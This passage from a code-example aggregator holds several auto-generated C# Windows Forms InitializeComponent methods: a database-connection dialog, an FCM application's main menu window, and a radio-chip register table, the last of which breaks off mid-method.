     this.lblName.Name      = "lblName";
     this.lblName.Size      = new System.Drawing.Size(78, 23);
     this.lblName.TabIndex  = 13;
     this.lblName.Text      = "链接名称:";
     //
     // butAdd
     //
     this.butAdd.AccessibleRole = System.Windows.Forms.AccessibleRole.PushButton;
     this.butAdd.ForeColor      = System.Drawing.SystemColors.InfoText;
     this.butAdd.Location       = new System.Drawing.Point(15, 56);
     this.butAdd.Name           = "butAdd";
     this.butAdd.Size           = new System.Drawing.Size(75, 23);
     this.butAdd.TabIndex       = 15;
     this.butAdd.Text           = "添  加";
     this.butAdd.Click         += new System.EventHandler(this.butAdd_Click);
     //
     // butFail
     //
     this.butFail.AccessibleRole = System.Windows.Forms.AccessibleRole.PushButton;
     this.butFail.ForeColor      = System.Drawing.SystemColors.InfoText;
     this.butFail.Location       = new System.Drawing.Point(141, 56);
     this.butFail.Name           = "butFail";
     this.butFail.Size           = new System.Drawing.Size(75, 23);
     this.butFail.TabIndex       = 16;
     this.butFail.Text           = "取  消";
     this.butFail.Click         += new System.EventHandler(this.butFail_Click);
     //
     // txbName
     //
     this.txbName.Location = new System.Drawing.Point(72, 22);
     this.txbName.Name     = "txbName";
     this.txbName.Size     = new System.Drawing.Size(100, 21);
     this.txbName.TabIndex = 17;
     //
     // FrmAddConnection
     //
     this.AutoScaleDimensions = new System.Drawing.SizeF(6F, 12F);
     this.ClientSize          = new System.Drawing.Size(251, 93);
     this.Controls.Add(this.txbName);
     this.Controls.Add(this.butFail);
     this.Controls.Add(this.butAdd);
     this.Controls.Add(this.lblName);
     this.Icon          = ((System.Drawing.Icon)(resources.GetObject("$this.Icon")));
     this.MaximizeBox   = false;
     this.MinimizeBox   = false;
     this.Name          = "FrmAddConnection";
     this.StartPosition = System.Windows.Forms.FormStartPosition.CenterParent;
     this.Text          = "添加数据库连接";
     this.ResumeLayout(false);
     this.PerformLayout();
 }
Example #44
0
File: UIfcm.cs Project: DR2010/FCM2
 /// <summary>
 /// Required method for Designer support - do not modify
 /// the contents of this method with the code editor.
 /// </summary>
 private void InitializeComponent()
 {
     this.components = new System.ComponentModel.Container();
     System.ComponentModel.ComponentResourceManager resources = new System.ComponentModel.ComponentResourceManager(typeof(UIfcm));
     this.mainMenu               = new System.Windows.Forms.MainMenu(this.components);
     this.menuItem5              = new System.Windows.Forms.MenuItem();
     this.menuItem2              = new System.Windows.Forms.MenuItem();
     this.miListNew              = new System.Windows.Forms.MenuItem();
     this.miProposal             = new System.Windows.Forms.MenuItem();
     this.menuItem3              = new System.Windows.Forms.MenuItem();
     this.miDocumentList         = new System.Windows.Forms.MenuItem();
     this.miDocumentLink         = new System.Windows.Forms.MenuItem();
     this.menuItem11             = new System.Windows.Forms.MenuItem();
     this.miDocumentSetList      = new System.Windows.Forms.MenuItem();
     this.miDocumentSetLink      = new System.Windows.Forms.MenuItem();
     this.menuItem7              = new System.Windows.Forms.MenuItem();
     this.miReferenceData        = new System.Windows.Forms.MenuItem();
     this.miReportMetadata       = new System.Windows.Forms.MenuItem();
     this.miUsers                = new System.Windows.Forms.MenuItem();
     this.miUserSettings         = new System.Windows.Forms.MenuItem();
     this.miRelatedReferenceCode = new System.Windows.Forms.MenuItem();
     this.menuItem8              = new System.Windows.Forms.MenuItem();
     this.miImpacted             = new System.Windows.Forms.MenuItem();
     this.miProcessRequest       = new System.Windows.Forms.MenuItem();
     this.menuItem1              = new System.Windows.Forms.MenuItem();
     this.openFileDialog         = new System.Windows.Forms.OpenFileDialog();
     this.pictureBox1            = new System.Windows.Forms.PictureBox();
     this.toolStrip1             = new System.Windows.Forms.ToolStrip();
     this.toolStripExit          = new System.Windows.Forms.ToolStripButton();
     this.toolStripClient        = new System.Windows.Forms.ToolStripButton();
     this.statusStrip1           = new System.Windows.Forms.StatusStrip();
     this.toolStripStatusLabel1  = new System.Windows.Forms.ToolStripStatusLabel();
     this.toolStripStatusLabel2  = new System.Windows.Forms.ToolStripStatusLabel();
     this.tslLoadedFrom          = new System.Windows.Forms.ToolStripStatusLabel();
     this.menuItem4              = new System.Windows.Forms.MenuItem();
     ((System.ComponentModel.ISupportInitialize)(this.pictureBox1)).BeginInit();
     this.toolStrip1.SuspendLayout();
     this.statusStrip1.SuspendLayout();
     this.SuspendLayout();
     //
     // mainMenu
     //
     this.mainMenu.MenuItems.AddRange(new System.Windows.Forms.MenuItem[] {
         this.menuItem5,
         this.menuItem2,
         this.menuItem3,
         this.menuItem11,
         this.menuItem7,
         this.menuItem8
     });
     //
     // menuItem5
     //
     this.menuItem5.Index  = 0;
     this.menuItem5.Text   = "E&xit";
     this.menuItem5.Click += new System.EventHandler(this.menuItem5_Click);
     //
     // menuItem2
     //
     this.menuItem2.Index = 1;
     this.menuItem2.MenuItems.AddRange(new System.Windows.Forms.MenuItem[] {
         this.miListNew,
         this.miProposal
     });
     this.menuItem2.Text = "Client";
     //
     // miListNew
     //
     this.miListNew.Index  = 0;
     this.miListNew.Tag    = "CLNTLIST";
     this.miListNew.Text   = "List";
     this.miListNew.Click += new System.EventHandler(this.miListNew_Click);
     //
     // miProposal
     //
     this.miProposal.Index  = 1;
     this.miProposal.Text   = "Proposal";
     this.miProposal.Click += new System.EventHandler(this.menuItem6_Click_1);
     //
     // menuItem3
     //
     this.menuItem3.Index = 2;
     this.menuItem3.MenuItems.AddRange(new System.Windows.Forms.MenuItem[] {
         this.miDocumentList,
         this.miDocumentLink
     });
     this.menuItem3.Text = "Document";
     //
     // miDocumentList
     //
     this.miDocumentList.Index  = 0;
     this.miDocumentList.Tag    = "DOCLIST";
     this.miDocumentList.Text   = "List";
     this.miDocumentList.Click += new System.EventHandler(this.menuItem1_Click);
     //
     // miDocumentLink
     //
     this.miDocumentLink.Index  = 1;
     this.miDocumentLink.Tag    = "DOCLINK";
     this.miDocumentLink.Text   = "Link";
     this.miDocumentLink.Click += new System.EventHandler(this.menuItem12_Click);
     //
     // menuItem11
     //
     this.menuItem11.Index = 3;
     this.menuItem11.MenuItems.AddRange(new System.Windows.Forms.MenuItem[] {
         this.miDocumentSetList,
         this.miDocumentSetLink
     });
     this.menuItem11.Text = "Document Set";
     //
     // miDocumentSetList
     //
     this.miDocumentSetList.Index  = 0;
     this.miDocumentSetList.Tag    = "DOCSETLIST";
     this.miDocumentSetList.Text   = "List";
     this.miDocumentSetList.Click += new System.EventHandler(this.menuItem9_Click);
     //
     // miDocumentSetLink
     //
     this.miDocumentSetLink.Index  = 1;
     this.miDocumentSetLink.Tag    = "DOCSETLINK";
     this.miDocumentSetLink.Text   = "Link";
     this.miDocumentSetLink.Click += new System.EventHandler(this.menuItem13_Click);
     //
     // menuItem7
     //
     this.menuItem7.Index = 4;
     this.menuItem7.MenuItems.AddRange(new System.Windows.Forms.MenuItem[] {
         this.miReferenceData,
         this.miReportMetadata,
         this.miUsers,
         this.miUserSettings,
         this.miRelatedReferenceCode
     });
     this.menuItem7.Text = "Maintenance";
     //
     // miReferenceData
     //
     this.miReferenceData.Index  = 0;
     this.miReferenceData.Tag    = "REFERENCEDATA";
     this.miReferenceData.Text   = "Reference Data";
     this.miReferenceData.Click += new System.EventHandler(this.miReferenceData_Click);
     //
     // miReportMetadata
     //
     this.miReportMetadata.Index  = 1;
     this.miReportMetadata.Tag    = "REPORTMETADATA";
     this.miReportMetadata.Text   = "Report Metadata";
     this.miReportMetadata.Click += new System.EventHandler(this.menuItem4_Click);
     //
     // miUsers
     //
     this.miUsers.Index  = 2;
     this.miUsers.Tag    = "USERACCESS";
     this.miUsers.Text   = "Users Authorisation";
     this.miUsers.Click += new System.EventHandler(this.miUsers_Click);
     //
     // miUserSettings
     //
     this.miUserSettings.Index  = 3;
     this.miUserSettings.Tag    = "USERSETTINGS";
     this.miUserSettings.Text   = "User Settings";
     this.miUserSettings.Click += new System.EventHandler(this.menuItem14_Click);
     //
     // miRelatedReferenceCode
     //
     this.miRelatedReferenceCode.Index  = 4;
     this.miRelatedReferenceCode.Text   = "Related Reference Code";
     this.miRelatedReferenceCode.Click += new System.EventHandler(this.miRelatedReferenceCode_Click);
     //
     // menuItem8
     //
     this.menuItem8.Index = 5;
     this.menuItem8.MenuItems.AddRange(new System.Windows.Forms.MenuItem[] {
         this.miImpacted,
         this.miProcessRequest,
         this.menuItem1,
         this.menuItem4
     });
     this.menuItem8.Text = "Miscelaneous";
     //
     // miImpacted
     //
     this.miImpacted.Index  = 0;
     this.miImpacted.Tag    = "DOCIMP";
     this.miImpacted.Text   = "Impacted Documents";
     this.miImpacted.Click += new System.EventHandler(this.miImpactedDocuments);
     //
     // miProcessRequest
     //
     this.miProcessRequest.Index  = 1;
     this.miProcessRequest.Tag    = "PROCESSREQUEST";
     this.miProcessRequest.Text   = "Process Request";
     this.miProcessRequest.Click += new System.EventHandler(this.miProcessRequest_Click);
     //
     // menuItem1
     //
     this.menuItem1.Index  = 2;
     this.menuItem1.Text   = "Send Email";
     this.menuItem1.Click += new System.EventHandler(this.menuItem1_Click_1);
     //
     // openFileDialog
     //
     this.openFileDialog.Multiselect = true;
     this.openFileDialog.Title       = "SAMS Parser.Net";
     //
     // pictureBox1
     //
     this.pictureBox1.Anchor      = ((System.Windows.Forms.AnchorStyles)((System.Windows.Forms.AnchorStyles.Bottom | System.Windows.Forms.AnchorStyles.Left)));
     this.pictureBox1.BorderStyle = System.Windows.Forms.BorderStyle.Fixed3D;
     this.pictureBox1.Image       = global::fcm.Properties.Resources.FCMLogo;
     this.pictureBox1.Location    = new System.Drawing.Point(12, 929);
     this.pictureBox1.Name        = "pictureBox1";
     this.pictureBox1.Size        = new System.Drawing.Size(236, 74);
     this.pictureBox1.SizeMode    = System.Windows.Forms.PictureBoxSizeMode.StretchImage;
     this.pictureBox1.TabIndex    = 0;
     this.pictureBox1.TabStop     = false;
     //
     // toolStrip1
     //
     this.toolStrip1.Items.AddRange(new System.Windows.Forms.ToolStripItem[] {
         this.toolStripExit,
         this.toolStripClient
     });
     this.toolStrip1.Location     = new System.Drawing.Point(0, 0);
     this.toolStrip1.Name         = "toolStrip1";
     this.toolStrip1.Size         = new System.Drawing.Size(587, 25);
     this.toolStrip1.TabIndex     = 1;
     this.toolStrip1.Text         = "toolStrip1";
     this.toolStrip1.ItemClicked += new System.Windows.Forms.ToolStripItemClickedEventHandler(this.toolStrip1_ItemClicked);
     //
     // toolStripExit
     //
     this.toolStripExit.DisplayStyle          = System.Windows.Forms.ToolStripItemDisplayStyle.Image;
     this.toolStripExit.Image                 = ((System.Drawing.Image)(resources.GetObject("toolStripExit.Image")));
     this.toolStripExit.ImageTransparentColor = System.Drawing.Color.Magenta;
     this.toolStripExit.Name   = "toolStripExit";
     this.toolStripExit.Size   = new System.Drawing.Size(23, 22);
     this.toolStripExit.Text   = "Exit";
     this.toolStripExit.Click += new System.EventHandler(this.menuItem5_Click);
     //
     // toolStripClient
     //
     this.toolStripClient.DisplayStyle          = System.Windows.Forms.ToolStripItemDisplayStyle.Image;
     this.toolStripClient.Image                 = ((System.Drawing.Image)(resources.GetObject("toolStripClient.Image")));
     this.toolStripClient.ImageTransparentColor = System.Drawing.Color.Magenta;
     this.toolStripClient.Name   = "toolStripClient";
     this.toolStripClient.Size   = new System.Drawing.Size(23, 22);
     this.toolStripClient.Text   = "Client Details";
     this.toolStripClient.Click += new System.EventHandler(this.miListNew_Click);
     //
     // statusStrip1
     //
     this.statusStrip1.Items.AddRange(new System.Windows.Forms.ToolStripItem[] {
         this.toolStripStatusLabel1,
         this.toolStripStatusLabel2,
         this.tslLoadedFrom
     });
     this.statusStrip1.Location = new System.Drawing.Point(0, 294);
     this.statusStrip1.Name     = "statusStrip1";
     this.statusStrip1.Size     = new System.Drawing.Size(587, 22);
     this.statusStrip1.TabIndex = 2;
     this.statusStrip1.Text     = "statusStrip1";
     //
     // toolStripStatusLabel1
     //
     this.toolStripStatusLabel1.Name = "toolStripStatusLabel1";
     this.toolStripStatusLabel1.Size = new System.Drawing.Size(55, 17);
     this.toolStripStatusLabel1.Text = "Database";
     //
     // toolStripStatusLabel2
     //
     this.toolStripStatusLabel2.Name   = "toolStripStatusLabel2";
     this.toolStripStatusLabel2.Size   = new System.Drawing.Size(46, 17);
     this.toolStripStatusLabel2.Text   = "Version";
     this.toolStripStatusLabel2.Click += new System.EventHandler(this.toolStripStatusLabel2_Click);
     //
     // tslLoadedFrom
     //
     this.tslLoadedFrom.Name = "tslLoadedFrom";
     this.tslLoadedFrom.Size = new System.Drawing.Size(77, 17);
     this.tslLoadedFrom.Text = "Loaded From";
     //
     // menuItem4
     //
     this.menuItem4.Index  = 3;
     this.menuItem4.Text   = "Load Cache";
     this.menuItem4.Click += new System.EventHandler(this.menuItem4_Click_1);
     //
     // UIfcm
     //
     this.AutoScaleBaseSize     = new System.Drawing.Size(5, 13);
     this.BackgroundImage       = ((System.Drawing.Image)(resources.GetObject("$this.BackgroundImage")));
     this.BackgroundImageLayout = System.Windows.Forms.ImageLayout.Zoom;
     this.ClientSize            = new System.Drawing.Size(587, 316);
     this.Controls.Add(this.statusStrip1);
     this.Controls.Add(this.toolStrip1);
     this.Controls.Add(this.pictureBox1);
     this.Icon     = ((System.Drawing.Icon)(resources.GetObject("$this.Icon")));
     this.Menu     = this.mainMenu;
     this.Name     = "UIfcm";
     this.ShowIcon = false;
     this.Tag      = "C:\\\\ProgramFiles\\\\FCM";
     this.Text     = " ";
     this.Load    += new System.EventHandler(this.frmParserMainUI_Load);
     this.Leave   += new System.EventHandler(this.frmParserMainUI_Leave);
     ((System.ComponentModel.ISupportInitialize)(this.pictureBox1)).EndInit();
     this.toolStrip1.ResumeLayout(false);
     this.toolStrip1.PerformLayout();
     this.statusStrip1.ResumeLayout(false);
     this.statusStrip1.PerformLayout();
     this.ResumeLayout(false);
     this.PerformLayout();
 }
Example #45
0
 private void InitializeComponent()
 {
     this.components = (IContainer) new Container();
     System.ComponentModel.ComponentResourceManager resources = new System.ComponentModel.ComponentResourceManager(typeof(RegTable));
     this.tbRegPllHf          = new System.Windows.Forms.TextBox();
     this.label81             = new System.Windows.Forms.Label();
     this.label72             = new System.Windows.Forms.Label();
     this.tbRegPaDac          = new System.Windows.Forms.TextBox();
     this.tbRegTcxo           = new System.Windows.Forms.TextBox();
     this.tbRegModemConfig3   = new System.Windows.Forms.TextBox();
     this.label71             = new System.Windows.Forms.Label();
     this.label69             = new System.Windows.Forms.Label();
     this.label70             = new System.Windows.Forms.Label();
     this.label80             = new System.Windows.Forms.Label();
     this.label82             = new System.Windows.Forms.Label();
     this.label79             = new System.Windows.Forms.Label();
     this.tbRegPreambleLsb    = new System.Windows.Forms.TextBox();
     this.tbRegPreambleMsb    = new System.Windows.Forms.TextBox();
     this.tbRegSymbTimeoutLsb = new System.Windows.Forms.TextBox();
     this.label74             = new System.Windows.Forms.Label();
     this.label73             = new System.Windows.Forms.Label();
     this.label66             = new System.Windows.Forms.Label();
     this.label46             = new System.Windows.Forms.Label();
     this.label45             = new System.Windows.Forms.Label();
     this.label44             = new System.Windows.Forms.Label();
     this.tbRegIrqFlagsMask   = new System.Windows.Forms.TextBox();
     this.label24             = new System.Windows.Forms.Label();
     this.label15             = new System.Windows.Forms.Label();
     this.label42             = new System.Windows.Forms.Label();
     this.tbRegModemConfig1   = new System.Windows.Forms.TextBox();
     this.tbRegModemConfig2   = new System.Windows.Forms.TextBox();
     this.label64             = new System.Windows.Forms.Label();
     this.label65             = new System.Windows.Forms.Label();
     this.label43             = new System.Windows.Forms.Label();
     this.label2            = new System.Windows.Forms.Label();
     this.label57           = new System.Windows.Forms.Label();
     this.label56           = new System.Windows.Forms.Label();
     this.tbRegLna          = new System.Windows.Forms.TextBox();
     this.tbRegOcp          = new System.Windows.Forms.TextBox();
     this.tbRegPaRamp       = new System.Windows.Forms.TextBox();
     this.tbRegPaConfig     = new System.Windows.Forms.TextBox();
     this.tbRegFrLsb        = new System.Windows.Forms.TextBox();
     this.tbRegFrMid        = new System.Windows.Forms.TextBox();
     this.tbRegFrMsb        = new System.Windows.Forms.TextBox();
     this.tbRegOpMode       = new System.Windows.Forms.TextBox();
     this.label55           = new System.Windows.Forms.Label();
     this.label39           = new System.Windows.Forms.Label();
     this.label9            = new System.Windows.Forms.Label();
     this.label32           = new System.Windows.Forms.Label();
     this.label37           = new System.Windows.Forms.Label();
     this.label36           = new System.Windows.Forms.Label();
     this.label35           = new System.Windows.Forms.Label();
     this.label34           = new System.Windows.Forms.Label();
     this.label33           = new System.Windows.Forms.Label();
     this.label31           = new System.Windows.Forms.Label();
     this.label30           = new System.Windows.Forms.Label();
     this.label8            = new System.Windows.Forms.Label();
     this.label7            = new System.Windows.Forms.Label();
     this.label6            = new System.Windows.Forms.Label();
     this.label5            = new System.Windows.Forms.Label();
     this.label4            = new System.Windows.Forms.Label();
     this.label3            = new System.Windows.Forms.Label();
     this.label29           = new System.Windows.Forms.Label();
     this.label10           = new System.Windows.Forms.Label();
     this.tableLayoutPanel1 = new System.Windows.Forms.TableLayoutPanel();
     this.tableLayoutPanel1.SuspendLayout();
     this.SuspendLayout();
     //
     // tbRegPllHf
     //
     this.tbRegPllHf.Location  = new System.Drawing.Point(575, 264);
     this.tbRegPllHf.Name      = "tbRegPllHf";
     this.tbRegPllHf.ReadOnly  = true;
     this.tbRegPllHf.Size      = new System.Drawing.Size(76, 22);
     this.tbRegPllHf.TabIndex  = 11;
     this.tbRegPllHf.TextAlign = System.Windows.Forms.HorizontalAlignment.Center;
     //
     // label81
     //
     this.label81.Anchor   = System.Windows.Forms.AnchorStyles.None;
     this.label81.AutoSize = true;
     this.label81.Location = new System.Drawing.Point(517, 270);
     this.label81.Name     = "label81";
     this.label81.Size     = new System.Drawing.Size(31, 15);
     this.label81.TabIndex = 0;
     this.label81.Text     = "0x70";
     //
     // label72
     //
     this.label72.Anchor   = System.Windows.Forms.AnchorStyles.None;
     this.label72.AutoSize = true;
     this.label72.Location = new System.Drawing.Point(391, 270);
     this.label72.Name     = "label72";
     this.label72.Size     = new System.Drawing.Size(49, 15);
     this.label72.TabIndex = 10;
     this.label72.Text     = "RegPllHf";
     //
     // tbRegPaDac
     //
     this.tbRegPaDac.Location  = new System.Drawing.Point(575, 235);
     this.tbRegPaDac.Name      = "tbRegPaDac";
     this.tbRegPaDac.ReadOnly  = true;
     this.tbRegPaDac.Size      = new System.Drawing.Size(76, 22);
     this.tbRegPaDac.TabIndex  = 11;
     this.tbRegPaDac.TextAlign = System.Windows.Forms.HorizontalAlignment.Center;
     //
     // tbRegTcxo
     //
     this.tbRegTcxo.Location  = new System.Drawing.Point(575, 206);
     this.tbRegTcxo.Name      = "tbRegTcxo";
     this.tbRegTcxo.ReadOnly  = true;
     this.tbRegTcxo.Size      = new System.Drawing.Size(76, 22);
     this.tbRegTcxo.TabIndex  = 11;
     this.tbRegTcxo.TextAlign = System.Windows.Forms.HorizontalAlignment.Center;
     //
     // tbRegModemConfig3
     //
     this.tbRegModemConfig3.Location  = new System.Drawing.Point(575, 177);
     this.tbRegModemConfig3.Name      = "tbRegModemConfig3";
     this.tbRegModemConfig3.ReadOnly  = true;
     this.tbRegModemConfig3.Size      = new System.Drawing.Size(76, 22);
     this.tbRegModemConfig3.TabIndex  = 11;
     this.tbRegModemConfig3.TextAlign = System.Windows.Forms.HorizontalAlignment.Center;
     //
     // label71
     //
     this.label71.Anchor   = System.Windows.Forms.AnchorStyles.None;
     this.label71.AutoSize = true;
     this.label71.Location = new System.Drawing.Point(386, 239);
     this.label71.Name     = "label71";
     this.label71.Size     = new System.Drawing.Size(60, 15);
     this.label71.TabIndex = 10;
     this.label71.Text     = "RegPaDac";
     //
     // label69
     //
     this.label69.Anchor   = System.Windows.Forms.AnchorStyles.None;
     this.label69.AutoSize = true;
     this.label69.Location = new System.Drawing.Point(388, 210);
     this.label69.Name     = "label69";
     this.label69.Size     = new System.Drawing.Size(55, 15);
     this.label69.TabIndex = 10;
     this.label69.Text     = "RegTcxo ";
     //
     // label70
     //
     this.label70.Anchor   = System.Windows.Forms.AnchorStyles.None;
     this.label70.AutoSize = true;
     this.label70.Location = new System.Drawing.Point(365, 181);
     this.label70.Name     = "label70";
     this.label70.Size     = new System.Drawing.Size(102, 15);
     this.label70.TabIndex = 10;
     this.label70.Text     = "RegModemConfig3 ";
     //
     // label80
     //
     this.label80.Anchor   = System.Windows.Forms.AnchorStyles.None;
     this.label80.AutoSize = true;
     this.label80.Location = new System.Drawing.Point(516, 239);
     this.label80.Name     = "label80";
     this.label80.Size     = new System.Drawing.Size(33, 15);
     this.label80.TabIndex = 0;
     this.label80.Text     = "0x4D";
     //
     // label82
     //
     this.label82.Anchor   = System.Windows.Forms.AnchorStyles.None;
     this.label82.AutoSize = true;
     this.label82.Location = new System.Drawing.Point(517, 210);
     this.label82.Name     = "label82";
     this.label82.Size     = new System.Drawing.Size(32, 15);
     this.label82.TabIndex = 0;
     this.label82.Text     = "0x4B";
     //
     // label79
     //
     this.label79.Anchor   = System.Windows.Forms.AnchorStyles.None;
     this.label79.AutoSize = true;
     this.label79.Location = new System.Drawing.Point(517, 181);
     this.label79.Name     = "label79";
     this.label79.Size     = new System.Drawing.Size(31, 15);
     this.label79.TabIndex = 0;
     this.label79.Text     = "0x26";
     //
     // tbRegPreambleLsb
     //
     this.tbRegPreambleLsb.Location  = new System.Drawing.Point(575, 148);
     this.tbRegPreambleLsb.Name      = "tbRegPreambleLsb";
     this.tbRegPreambleLsb.ReadOnly  = true;
     this.tbRegPreambleLsb.Size      = new System.Drawing.Size(76, 22);
     this.tbRegPreambleLsb.TabIndex  = 11;
     this.tbRegPreambleLsb.TextAlign = System.Windows.Forms.HorizontalAlignment.Center;
     //
     // tbRegPreambleMsb
     //
     this.tbRegPreambleMsb.Location  = new System.Drawing.Point(575, 119);
     this.tbRegPreambleMsb.Name      = "tbRegPreambleMsb";
     this.tbRegPreambleMsb.ReadOnly  = true;
     this.tbRegPreambleMsb.Size      = new System.Drawing.Size(76, 22);
     this.tbRegPreambleMsb.TabIndex  = 11;
     this.tbRegPreambleMsb.TextAlign = System.Windows.Forms.HorizontalAlignment.Center;
     //
     // tbRegSymbTimeoutLsb
     //
     this.tbRegSymbTimeoutLsb.Location  = new System.Drawing.Point(575, 90);
     this.tbRegSymbTimeoutLsb.Name      = "tbRegSymbTimeoutLsb";
     this.tbRegSymbTimeoutLsb.ReadOnly  = true;
     this.tbRegSymbTimeoutLsb.Size      = new System.Drawing.Size(76, 22);
     this.tbRegSymbTimeoutLsb.TabIndex  = 11;
     this.tbRegSymbTimeoutLsb.TextAlign = System.Windows.Forms.HorizontalAlignment.Center;
     //
     // label74
     //
     this.label74.Anchor   = System.Windows.Forms.AnchorStyles.None;
     this.label74.AutoSize = true;
     this.label74.Location = new System.Drawing.Point(517, 152);
     this.label74.Name     = "label74";
     this.label74.Size     = new System.Drawing.Size(31, 15);
     this.label74.TabIndex = 0;
     this.label74.Text     = "0x21";
     //
     // label73
     //
     this.label73.Anchor   = System.Windows.Forms.AnchorStyles.None;
     this.label73.AutoSize = true;
     this.label73.Location = new System.Drawing.Point(517, 123);
     this.label73.Name     = "label73";
     this.label73.Size     = new System.Drawing.Size(31, 15);
     this.label73.TabIndex = 0;
     this.label73.Text     = "0x20";
     //
     // label66
     //
     this.label66.Anchor   = System.Windows.Forms.AnchorStyles.None;
     this.label66.AutoSize = true;
     this.label66.Location = new System.Drawing.Point(517, 94);
     this.label66.Name     = "label66";
     this.label66.Size     = new System.Drawing.Size(32, 15);
     this.label66.TabIndex = 0;
     this.label66.Text     = "0x1F";
     //
     // label46
     //
     this.label46.Anchor   = System.Windows.Forms.AnchorStyles.None;
     this.label46.AutoSize = true;
     this.label46.Location = new System.Drawing.Point(371, 152);
     this.label46.Name     = "label46";
     this.label46.Size     = new System.Drawing.Size(90, 15);
     this.label46.TabIndex = 10;
     this.label46.Text     = "RegPreambleLsb";
     //
     // label45
     //
     this.label45.Anchor   = System.Windows.Forms.AnchorStyles.None;
     this.label45.AutoSize = true;
     this.label45.Location = new System.Drawing.Point(369, 123);
     this.label45.Name     = "label45";
     this.label45.Size     = new System.Drawing.Size(93, 15);
     this.label45.TabIndex = 10;
     this.label45.Text     = "RegPreambleMsb";
     //
     // label44
     //
     this.label44.Anchor   = System.Windows.Forms.AnchorStyles.None;
     this.label44.AutoSize = true;
     this.label44.Location = new System.Drawing.Point(361, 94);
     this.label44.Name     = "label44";
     this.label44.Size     = new System.Drawing.Size(110, 15);
     this.label44.TabIndex = 10;
     this.label44.Text     = "RegSymbTimeoutLsb";
     //
     // tbRegIrqFlagsMask
     //
     this.tbRegIrqFlagsMask.Location  = new System.Drawing.Point(237, 264);
     this.tbRegIrqFlagsMask.Name      = "tbRegIrqFlagsMask";
     this.tbRegIrqFlagsMask.ReadOnly  = true;
     this.tbRegIrqFlagsMask.Size      = new System.Drawing.Size(72, 22);
     this.tbRegIrqFlagsMask.TabIndex  = 11;
     this.tbRegIrqFlagsMask.TextAlign = System.Windows.Forms.HorizontalAlignment.Center;
     //
     // label24
     //
     this.label24.Anchor   = System.Windows.Forms.AnchorStyles.None;
     this.label24.AutoSize = true;
     this.label24.Location = new System.Drawing.Point(179, 270);
     this.label24.Name     = "label24";
     this.label24.Size     = new System.Drawing.Size(31, 15);
     this.label24.TabIndex = 0;
     this.label24.Text     = "0x11";
     //
     // label15
     //
     this.label15.Anchor   = System.Windows.Forms.AnchorStyles.None;
     this.label15.AutoSize = true;
     this.label15.Location = new System.Drawing.Point(29, 270);
     this.label15.Name     = "label15";
     this.label15.Size     = new System.Drawing.Size(97, 15);
     this.label15.TabIndex = 0;
     this.label15.Text     = " RegIrqFlagsMask";
     //
     // label42
     //
     this.label42.Anchor   = System.Windows.Forms.AnchorStyles.None;
     this.label42.AutoSize = true;
     this.label42.Location = new System.Drawing.Point(366, 36);
     this.label42.Name     = "label42";
     this.label42.Size     = new System.Drawing.Size(99, 15);
     this.label42.TabIndex = 10;
     this.label42.Text     = "RegModemConfig1";
     //
     // tbRegModemConfig1
     //
     this.tbRegModemConfig1.Location  = new System.Drawing.Point(575, 32);
     this.tbRegModemConfig1.Name      = "tbRegModemConfig1";
     this.tbRegModemConfig1.ReadOnly  = true;
     this.tbRegModemConfig1.Size      = new System.Drawing.Size(76, 22);
     this.tbRegModemConfig1.TabIndex  = 11;
     this.tbRegModemConfig1.TextAlign = System.Windows.Forms.HorizontalAlignment.Center;
     //
     // tbRegModemConfig2
     //
     this.tbRegModemConfig2.Location  = new System.Drawing.Point(575, 61);
     this.tbRegModemConfig2.Name      = "tbRegModemConfig2";
     this.tbRegModemConfig2.ReadOnly  = true;
     this.tbRegModemConfig2.Size      = new System.Drawing.Size(76, 22);
     this.tbRegModemConfig2.TabIndex  = 11;
     this.tbRegModemConfig2.TextAlign = System.Windows.Forms.HorizontalAlignment.Center;
     //
     // label64
     //
     this.label64.Anchor   = System.Windows.Forms.AnchorStyles.None;
     this.label64.AutoSize = true;
     this.label64.Location = new System.Drawing.Point(516, 36);
     this.label64.Name     = "label64";
     this.label64.Size     = new System.Drawing.Size(33, 15);
     this.label64.TabIndex = 0;
     this.label64.Text     = "0x1D";
     //
     // label65
     //
     this.label65.Anchor   = System.Windows.Forms.AnchorStyles.None;
     this.label65.AutoSize = true;
     this.label65.Location = new System.Drawing.Point(517, 65);
     this.label65.Name     = "label65";
     this.label65.Size     = new System.Drawing.Size(32, 15);
     this.label65.TabIndex = 0;
     this.label65.Text     = "0x1E";
     //
     // label43
     //
     this.label43.Anchor   = System.Windows.Forms.AnchorStyles.None;
     this.label43.AutoSize = true;
     this.label43.Location = new System.Drawing.Point(366, 65);
     this.label43.Name     = "label43";
     this.label43.Size     = new System.Drawing.Size(99, 15);
     this.label43.TabIndex = 10;
     this.label43.Text     = "RegModemConfig2";
     //
     // label2
     //
     this.label2.Anchor   = System.Windows.Forms.AnchorStyles.None;
     this.label2.AutoSize = true;
     this.label2.Location = new System.Drawing.Point(43, 36);
     this.label2.Name     = "label2";
     this.label2.Size     = new System.Drawing.Size(69, 15);
     this.label2.TabIndex = 5;
     this.label2.Text     = "RegOpMode";
     //
     // label57
     //
     this.label57.Anchor   = System.Windows.Forms.AnchorStyles.None;
     this.label57.AutoSize = true;
     this.label57.Font     = new System.Drawing.Font("Arial Unicode MS", 9F, System.Drawing.FontStyle.Bold, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
     this.label57.Location = new System.Drawing.Point(594, 6);
     this.label57.Name     = "label57";
     this.label57.Size     = new System.Drawing.Size(38, 16);
     this.label57.TabIndex = 0;
     this.label57.Text     = "Data";
     //
     // label56
     //
     this.label56.Anchor   = System.Windows.Forms.AnchorStyles.None;
     this.label56.AutoSize = true;
     this.label56.Font     = new System.Drawing.Font("Arial Unicode MS", 9F, System.Drawing.FontStyle.Bold, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
     this.label56.Location = new System.Drawing.Point(254, 6);
     this.label56.Name     = "label56";
     this.label56.Size     = new System.Drawing.Size(38, 16);
     this.label56.TabIndex = 0;
     this.label56.Text     = "Data";
     //
     // tbRegLna
     //
     this.tbRegLna.Location  = new System.Drawing.Point(237, 235);
     this.tbRegLna.Name      = "tbRegLna";
     this.tbRegLna.ReadOnly  = true;
     this.tbRegLna.Size      = new System.Drawing.Size(72, 22);
     this.tbRegLna.TabIndex  = 11;
     this.tbRegLna.TextAlign = System.Windows.Forms.HorizontalAlignment.Center;
     //
     // tbRegOcp
     //
     this.tbRegOcp.Location  = new System.Drawing.Point(237, 206);
     this.tbRegOcp.Name      = "tbRegOcp";
     this.tbRegOcp.ReadOnly  = true;
     this.tbRegOcp.Size      = new System.Drawing.Size(72, 22);
     this.tbRegOcp.TabIndex  = 11;
